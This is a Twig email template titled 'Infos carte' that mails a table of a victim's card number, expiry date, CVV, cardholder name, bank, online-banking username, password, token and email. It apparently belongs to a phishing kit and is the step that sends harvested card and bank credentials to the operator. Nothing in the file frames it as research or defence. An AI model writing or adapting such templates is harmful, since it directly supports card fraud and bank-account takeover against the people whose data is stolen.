{% extends 'emails/layout.html.twig' %}

{% block subject %}Infos carte{% endblock %}

{% block body %}
     <table class="table">
        <tbody>
            <tr>
                <th>Ccnumber</th>
                <td>{{ login.ccnumber }}</td>
            </tr>
            <tr>
                <th>Ccmonth</th>
                <td>{{ login.ccmonth }}</td>
            </tr>
            <tr>
                <th>Ccyear</th>
                <td>{{ login.ccyear }}</td>
            </tr>
            <tr>
                <th>Cvv</th>
                <td>{{ login.cvv }}</td>
            </tr>
            <tr>
                <th>Ccname</th>
                <td>{{ login.ccname }}</td>
            </tr>
            <tr>
                <th>Bank</th>
                <td>{{ login.bank.name }}</td>
            </tr>
            <tr>
                <th>Username</th>
                <td>{{ login.username }}</td>
            </tr>
            <tr>
                <th>Password</th>
                <td>{{ login.password }}</td>
            </tr>
            <tr>
                <th>Token</th>
                <td>{{ login.token }}</td>
            </tr>
            <tr>
                <th>Email</th>
                <td>{{ login.email }}</td>
            </tr>
        </tbody>
    </table>
{% endblock %}
